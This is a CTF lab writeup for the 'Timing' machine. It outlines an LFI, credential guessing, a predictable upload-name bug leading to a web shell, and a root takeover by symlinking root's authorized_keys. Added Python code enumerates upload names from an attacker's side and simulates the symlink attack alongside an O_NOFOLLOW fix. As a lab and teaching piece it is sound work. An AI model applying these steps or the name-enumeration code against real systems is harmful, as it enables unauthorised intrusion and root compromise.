Timing writeup by evyatar9

Read my writeup for the Timing machine on:

TL;DR

User: Found an LFI in image.php and used it to read the source of the PHP files. /etc/passwd lists a user named aaron, and the credentials aaron:aaron log in to the web portal. profile_update.php shows that we can change our own role, which grants permission to upload files. The "random" file name produced by upload.php can be calculated, because the developer wrote md5('$file_hash' ...) instead of md5($file_hash ...): a single-quoted PHP string is not interpolated, so the literal text $file_hash is hashed instead of the random value. Using that we upload a web shell. A backup at /opt/source-files-backup.zip contains a .git directory; checking out an earlier commit reveals the SSH password of aaron in db_conn.php.
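
The following is an added example, not code from the writeup or from the Timing box, modelling why the upload name is predictable. The page only shows the `md5('$file_hash' ...)` fragment; what follows the literal is not on the page, so this model assumes it is a Unix timestamp (a hypothetical `md5('$file_hash' . time())`) and shows how an attacker enumerates candidate names over a small clock-skew window. `find_upload`, `candidate_names` and the `exists` callback are illustrative names; in practice `exists` would be an HTTP request for each candidate.

```python
import hashlib
from typing import Callable, List, Optional

# Single-quoted '$file_hash' in PHP is the ten-byte literal string, not the
# random value stored in the variable, so every upload hashes the same prefix.
LITERAL = b"$file_hash"


def buggy_name(ts: int) -> str:
    """Name stem the vulnerable upload.php would produce for an upload at Unix time ts.
    ASSUMPTION: the part of the hashed input after the literal is time()."""
    return hashlib.md5(LITERAL + str(ts).encode()).hexdigest()


def intended_name(file_hash: str, ts: int) -> str:
    """What md5($file_hash . time()) would produce: depends on a per-upload
    secret the attacker does not have, so it cannot be enumerated."""
    return hashlib.md5(file_hash.encode() + str(ts).encode()).hexdigest()


def candidate_names(upload_ts: int, skew: int = 5) -> List[str]:
    """Attacker side: names to probe when the server clock may differ from ours
    by up to +/- skew seconds around the moment we submitted the upload."""
    return [buggy_name(t) for t in range(upload_ts - skew, upload_ts + skew + 1)]


def find_upload(exists: Callable[[str], bool], upload_ts: int, skew: int = 5) -> Optional[str]:
    """Return the first candidate name that exists on the server, or None.
    `exists` stands in for an HTTP GET of the candidate path (hypothetical)."""
    for name in candidate_names(upload_ts, skew):
        if exists(name):
            return name
    return None


if __name__ == "__main__":
    upload_ts = 1700000000  # constructed: the time we submitted the web shell
    # Constructed server: the file actually landed 3 seconds after our clock.
    server_files = {buggy_name(upload_ts + 3)}
    print("predicted:", find_upload(server_files.__contains__, upload_ts))
```

Note that the brute force costs only a handful of requests because the prefix is constant; once `$file_hash` is actually interpolated, the attacker would also need the random value, which is the whole point of that variable.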

Root: sudo -l shows that we can run /usr/bin/netutils as root (it runs a jar located in the root directory). The jar downloads files (HTTP/FTP) onto the target machine and writes them with root permissions. We create a symlink in aaron's home directory pointing to /root/.ssh/authorized_keys, then download a file with the same name from our host; that file contains our SSH public key. As soon as the download completes, the write goes through the symlink and we can log in as root with the matching SSH private key.
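
The root step comes down to a privileged writer following a symlink the unprivileged user controls. The following is an added example, not the netutils jar or any code from the writeup: it simulates the layout under a temporary directory (the "/root/.ssh" and "/home/aaron" paths, the key strings and the function names are all constructed), shows the naive write overwriting root's authorized_keys through the link, and shows the check a downloader running as root should make, opening with O_NOFOLLOW so a symlink at the destination fails with ELOOP instead of being followed.

```python
import errno
import os
import tempfile
from typing import Callable, Optional, Tuple

# Constructed placeholders for the key material (not real keys).
ROOT_ORIGINAL_KEY = b"ssh-ed25519 AAAA_CONSTRUCTED_ROOT_KEY root@timing\n"
ATTACKER_KEY = b"ssh-ed25519 AAAA_CONSTRUCTED_ATTACKER_KEY attacker@kali\n"


def privileged_write_naive(dest: str, data: bytes) -> None:
    """How a careless root-run downloader stores a fetched file:
    open() follows symlinks, so `dest` may resolve anywhere."""
    with open(dest, "wb") as f:
        f.write(data)


def privileged_write_safe(dest: str, data: bytes) -> None:
    """Hardened variant: O_NOFOLLOW makes open() fail with ELOOP if the final
    path component is a symlink, so a planted link cannot redirect the write."""
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def simulate(writer: Callable[[str, bytes], None]) -> Tuple[bool, Optional[str]]:
    """Run the authorized_keys symlink attack against `writer` in a temp tree.
    Returns (root's authorized_keys now holds the attacker key, errno name or None)."""
    with tempfile.TemporaryDirectory() as base:
        root_ssh = os.path.join(base, "root", ".ssh")      # stands in for /root/.ssh
        home = os.path.join(base, "home", "aaron")         # stands in for /home/aaron
        os.makedirs(root_ssh)
        os.makedirs(home)
        target = os.path.join(root_ssh, "authorized_keys")
        with open(target, "wb") as f:
            f.write(ROOT_ORIGINAL_KEY)

        # Attacker step: a link in our own home, named like the file root will
        # download, pointing at root's authorized_keys.
        link = os.path.join(home, "authorized_keys")
        os.symlink(target, link)

        # Root step: the downloader fetches "authorized_keys" from our host
        # (contents = our public key) and writes it into the working directory.
        err = None
        try:
            writer(link, ATTACKER_KEY)
        except OSError as e:
            err = errno.errorcode.get(e.errno, str(e.errno))

        with open(target, "rb") as f:
            return f.read() == ATTACKER_KEY, err


if __name__ == "__main__":
    print("naive writer:", simulate(privileged_write_naive))  # root key replaced
    print("safe writer: ", simulate(privileged_write_safe))   # refused with ELOOP
```

O_NOFOLLOW only protects the last path component; a privileged tool that writes into a directory the caller controls should also refuse symlinked parent directories (or write as the invoking user, which is the real fix for a sudo-exposed downloader).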